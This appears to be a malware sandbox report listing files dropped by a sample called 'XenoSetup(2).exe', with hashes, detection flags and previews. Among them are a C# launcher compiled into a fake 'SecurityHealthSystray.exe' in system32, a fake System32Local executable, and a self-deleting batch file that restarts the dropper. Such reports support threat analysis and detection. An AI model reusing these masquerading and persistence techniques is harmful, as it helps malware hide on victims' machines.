Preview:	.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.914766306138698
Encrypted:	false
SSDEEP:	48:6nYmdtFxZ8RxeOAkFJOcV4MKe28dPXfPvqBH3uulB+hnqXSfbNtm:qyxvxVx9vPPvkpTkZzNt
MD5:	5FC7366144CDE7BD293819461793C12A
SHA1:	F9E3F99B00E53AE0157984E4E14B8EA8F28C6E8D
SHA-256:	28841168D8723AC5DBC2E7776213522EB973767D89C76EC79E0464973091D412
SHA-512:	EEE7881A7A6BF41B8BCC90D60F86BE91A5BC8CB81CD3D49F43BF3E8FE2CF04C4BCC3FF552A2146F0A380525882DB16C1FD451B0B3C936E4501A6A837D88254C6
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .g.............................'... ...@....@.. ....................................@.................................T'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..,.............................................................(.....0..!.......r...pr...p.{....(....(....&..&......................0..........r...p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DriverbrokerCrtDhcp.exe.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1915
Entropy (8bit):	5.363869398054153
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHmHKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKkt1GqZ4vb
MD5:	B3D8CC65029ED629D3371F6862D653E0
SHA1:	9D3D093780ABCE0D0DC0CDCE5EBE8E77BCEDC621
SHA-256:	83F3CDA23DB0E9B53FDDA654446707DDE6F92D4566938AE499471C701F88C245
SHA-512:	3ED07C087E69A317D904D2E73E024B561AF2B92F273B30CB9B748D3B4D20B502CC32322EDA60F46A4AAE5A030FBBE3C39F73A06BC5415DC26BFCF59273CFC7BF
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NZdXlPbVdUubKXQ.exe.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XenoSetup(2).exe.bin.exe.log

Download File

Process:	C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllullkv/tz:NllU+v/
MD5:	6442F277E58B3984BA5EEE0C15C0C6AD
SHA1:	5343ADC2E7F102EC8FB6A101508730898CB14F57
SHA-256:	36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
SHA-512:	F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.0.cs

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	391
Entropy (8bit):	5.033908413401092
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLmniFkD:JNVQIbSfhV7TiFkMSfhCiFkD
MD5:	2294737FFFA3D4E71D0151DD90936344
SHA1:	2DE2772F3E51BFE351FA74D1877FB191E3BDFD22
SHA-256:	7A016BE12F374313C894FC7BE98D7324FCE940EF6C24BFF20ACF848D4E6E4AE7
SHA-512:	496867F376C4A5553E853EAF5AD633F55E27CCDE6C918061EBAAA723390B165E2A34B22AC3A9B97FCAAAC129AF80C7976A2092AE6F7836265C5ABE96969F1A6A
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.cmdline

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	253
Entropy (8bit):	5.063275417743161
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8oN723feK39n:Hu7L//TRq79cQnaZ9
MD5:	B9C5E161831E4F18077070E3E89366BC
SHA1:	AF9CEF0D0894B1FE0500ACDDDDB7D3CE2DD9D2BA
SHA-256:	E83C312D9972C23CFB50A2589718B044EB636C0AA9C7E665BB91AD33ED232611
SHA-512:	C30B7CF32037AE2C33D0B203EE5DB51A3E8FDA79B14D0A44E35654F4B8BCC2D640A133D2302B40FDEAB749470C35BC9DF74DFF2FF48829ACD1238347502FDC6F
Malicious:	false
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.0.cs"

C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.out

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (326), with CRLF, CR line terminators
Category:	modified
Size (bytes):	747
Entropy (8bit):	5.252702941311131
Encrypted:	false
SSDEEP:	12:Z2MI/u7L//TRq79cQnaZ4KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:0MI/un/Vq79tnaZ4Kax5DqBVKVrdFAMb
MD5:	A38E2849DFE59304715A43957F39013A
SHA1:	F891507C439CEC2EAA091EE2C4BC194AB8E2B910
SHA-256:	88C7AE2978DD08966EC0DB6004119C6078C20DD21BE170067CADF6D9042647AB
SHA-512:	5396EE2D672067DB574B4D8A7FA3745A6EA570EEBBA2373FEC4274C023AB814FF1EADE460961615FB26F09659214F93783BDC3CA62C4718072231CEED4FC46B5
Malicious:	false
Preview:	.C:\portBrokerDll> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\8dcADkVv20.bat

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	171
Entropy (8bit):	5.087622954075878
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mmXBFAXhJ3hjX3qwsLAdASBktKcKZG1N+E2J5xAIgg:hCRLuVFOOr+DEmRwZNXskbKOZG1N7237
MD5:	BA9AD761A27922A1A3AEF3D52A8221C4
SHA1:	4B7D4F70B4CA3C70F561764365B97551DBFE9846
SHA-256:	0FA90728A791515C5BAF8C94627884D31EA0B57233507EDA3EE1E32842D35572
SHA-512:	60C4ECF4C29F780F3CE4BBD8F567BDAA81DCB03961BBE939ABE95938611CAB6285173746E9DD4FE5E68B1B01193990A9DA7248DECA545C90E9747F7B9EE47456
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\8dcADkVv20.bat"

C:\Users\user\AppData\Local\Temp\CSCF5A66DC0AE3041F58A3C1CE4B9A61B98.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1192
Entropy (8bit):	4.4621588860521735
Encrypted:	false
SSDEEP:	24:uhxLMuZhNQQplkcv+YplkcIPNnqNdt4+lEbNFjMyi07:COulNLn+YLoqTSfbNtme
MD5:	DC289C30C143FD2F8E608119AE4846A0
SHA1:	2F0D6888B80D26D9FF52B5DECDD63963255E5113
SHA-256:	37AAC241C050FB90090B36441AE1F198D11A0DA4EE5F30E3332673F3C6ECF40A
SHA-512:	68BFFD2B69EE9D5857FC9D5B2A71561A985738B5FE0768FC7DD23A753C976529158042F2A239FFE74ED99B5BD4B469FD2220A990D20A742935F5560A55F2D6FD
Malicious:	false
Preview:	.... ...........................\...<...............0...........\.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...D.....I.n.t.e.r.n.a.l.N.a.m.e...X.e.n.o.S.e.t.u.p.(.1.)...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...L.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...X.e.n.o.S.e.t.u.p.(.1.)...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges

C:\Users\user\AppData\Local\Temp\MNP3j15Kfs

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774724
Encrypted:	false
SSDEEP:	3:kG+mn:1+m
MD5:	6C39D401B2D661AE03C5583576BA65BD
SHA1:	FCDA5B21914C1E7E48A9DAA6C8CBC9C35EEA5ED2
SHA-256:	2BB5BCB9F9402AFAACBF4F072A4DA2B4FAD01BE4D8C5CABDDF32CEB24B0C956B
SHA-512:	9B80AD9A1E3DFB0B5179B000EFF397525C832295DB1A3AD991C69B93BD6FB214E9A9986B24285741AD1BFEB0B070348A37088A3E374C232ACA301C382F1D9ECF
Malicious:	false
Preview:	p5Tpm1Jkma7822PRQ0gNSelVo

C:\Users\user\AppData\Local\Temp\RES4177.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6cc, 10 symbols, created Mon Jan 13 14:18:02 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	4.603219596415286
Encrypted:	false
SSDEEP:	24:HRtm9BLz07/gaHBqwKNN0lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ScN:xILz0zlhBKNilmuulB+hnqXSfbNtmhn
MD5:	C38DBC53B61402C0A5E73635EDDEFC3F
SHA1:	AA8BE4A664174C3563FC3A9C09A1ABFD194E78F9
SHA-256:	9A9264B4ED2C7B51B9BFD9DEB1D47A9C200E23A90E5A46EEE870F31E950EDD59
SHA-512:	C6C3E197EF973CBA5E10E1A928879B867A7B3B9C0656E3690C2ADD1A75B317E0E82AA6D7B23B030C1197F441525FE13B063224260456D1E94FA50FD74E2B4680
Malicious:	false
Preview:	L.... .g.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSCEACDD11852CD4DF0A8C4FA8867592994.TMP....................q.QK.......N..........7.......C:\Users\user\AppData\Local\Temp\RES4177.tmp.-.<....................a..Microsoft (R) CVTRES.X.=..cwd.C:\portBrokerDll.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.

C:\Users\user\AppData\Local\Temp\RES436B.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d8, 10 symbols, created Mon Jan 13 14:18:03 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1936
Entropy (8bit):	4.5801901370802165
Encrypted:	false
SSDEEP:	24:H869QaUSFCaHQwKNNclOxLMuZhNQQplkcv+YplkcIPNnqpdt4+lEbNFjMyi0+uC:jLBfKNqlOOulNLn+YLoqXSfbNtmhZ
MD5:	1CB4758501806A14191C1265109B126C
SHA1:	09EFBE7125F754CD15E2EDCAC99B799061585314
SHA-256:	00D8A9178EB5659F479DED9B7D8691D6B57554A2DABD94158288B188BFDE1F53
SHA-512:	129EE5451B0407A3B78D9351C6F0BD78EB8799DD92F9595FBCFC4BBB0570E01E22BBEED62F13216DBAB3F330A7018EEAB5E35C9875C6D623462BEEE56616AA57
Malicious:	false
Preview:	L.... .g.............debug$S........H...................@..B.rsrc$01................t...........@..@.rsrc$02........P...................@..@........N....c:\Users\user\AppData\Local\Temp\CSCF5A66DC0AE3041F58A3C1CE4B9A61B98.TMP..................(.0.C./.`...HF...........7.......C:\Users\user\AppData\Local\Temp\RES436B.tmp.-.<....................a..Microsoft (R) CVTRES.X.=..cwd.C:\portBrokerDll.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................\...............................................\.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...D.....I.n.t.e.r.n.a.l.N.a.m.e...X.e.n.o.

C:\Users\user\AppData\Local\Temp\RES458E.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e4, 10 symbols, created Mon Jan 13 14:18:04 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1948
Entropy (8bit):	4.551540606792553
Encrypted:	false
SSDEEP:	24:HpjG9EnOOGszaHyWwKNN8luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+YEgUZ:VES1KNKluOulajfqXSfbNtmhY2Z
MD5:	F38F38DE6FA1CC365360CB54BB15A0BC
SHA1:	755B23CBE32338F10B88EAA7EE7BCC8A4AE28676
SHA-256:	9590322D1996F96FFD23971655562C50807BDD81C8B3174747A1ECD7D91C06E3
SHA-512:	CED516B1AB6CF0ED291B0475896E108A63373F5FDEA01ADABCAFF7BF4C970B34761600517D16793BAB601E7EDE2EEC22EA614B4A91D5FCE6D8CC6839A7B023DE
Malicious:	false
Preview:	L.... .g.............debug$S........4...................@..B.rsrc$01................`...........@..@.rsrc$02........p...t...............@..@........;....c:\Windows\System32\CSC3568A44F8D2D461ABD894E9C160B8C.TMP...................r.av..t.y..............7.......C:\Users\user\AppData\Local\Temp\RES458E.tmp.-.<....................a..Microsoft (R) CVTRES.X.=..cwd.C:\portBrokerDll.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.

C:\Users\user\AppData\Local\Temp\Xeno.exe

Download File

Process:	C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3722240
Entropy (8bit):	0.38798312363186405
Encrypted:	false
SSDEEP:	3072:rjK4UGDHXrQ8hy7qgpHulWD9ZvZ5Pf3Ca10xuZ04ntfOUhBu7R:rjK4TDUqgpqWDLZ5H+xuZ04nhA
MD5:	056586E6A4D9B97C77FD606B2A63F604
SHA1:	B13E10949DF28F3944C68B950617A641EA20491B
SHA-256:	4D3B4EF0EC929EBD649637F55AABD856954E3D6424AC337A17EE4BB65EC2E8F3
SHA-512:	DA2C4066A7975EDE5C1645D6CD82F0499B452A021D18AA86AD64130EFC9F1DA2270BE30A7AF89B4CCE97B0EB13C27F55F37C70DB5F2F6AA4A2B5A54DCAE72CC0
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........G6..)e..)e..)elR*d..)elR-d..)elR,d..)e...e..)e.(d..)e..(ef.)e.U d..)e.U+d..)eRich..)e........................PE..d......f.........."....(.Z..........@..........@..........................................`..........................................................`..\....0..\............P..(.......T.......................(...P...@............p...............................text...lY.......Z.................. ..`.rdata.......p.......^..............@..@.data...............................@....pdata..\....0......................@..@.reloc..(....P......................@..B.rsrc...\....`......................@..@................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe

Download File

Process:	C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.9308275015105774
Encrypted:	false
SSDEEP:	48:6vOvtlNY28D9EczBdFJyrcV4MKe2iesLhXfk9uvqBH6OulNLn+YLoqXSfbNtm:59hGEoVx9pNPkYvkkXr+YUzNt
MD5:	987977139A7494D10F11EC2EC89FBED3
SHA1:	33EAD1226A515435113FE0F2B0075C6F85A9F8E8
SHA-256:	4A49CF0F1F9F03385CCA90BA2E902EDACF1B353131427E63EFC0542ADD56775C
SHA-512:	0B4DEFC6B03B43C6A48E1652590F7B1DC617B245A611B4B530ADC38A0FAE53F91B7514500C1E1E2C02EA70176E4E143C82D5650CA2A55CAA6E1068A0C230EF16
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .g.............................'... ...@....@.. ....................................@.................................P'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..(.............................................................(.....0..!.......r...pru..p.{....(....(....&..&......................0..........ry..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....$.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe.exe (copy)

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.9308275015105774
Encrypted:	false
SSDEEP:	48:6vOvtlNY28D9EczBdFJyrcV4MKe2iesLhXfk9uvqBH6OulNLn+YLoqXSfbNtm:59hGEoVx9pNPkYvkkXr+YUzNt
MD5:	987977139A7494D10F11EC2EC89FBED3
SHA1:	33EAD1226A515435113FE0F2B0075C6F85A9F8E8
SHA-256:	4A49CF0F1F9F03385CCA90BA2E902EDACF1B353131427E63EFC0542ADD56775C
SHA-512:	0B4DEFC6B03B43C6A48E1652590F7B1DC617B245A611B4B530ADC38A0FAE53F91B7514500C1E1E2C02EA70176E4E143C82D5650CA2A55CAA6E1068A0C230EF16
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .g.............................'... ...@....@.. ....................................@.................................P'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..(.............................................................(.....0..!.......r...pru..p.{....(....(....&..&......................0..........ry..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....$.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0prfegfh.qll.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aee454tg.wdh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzshtefy.kj2.psm1

Download File

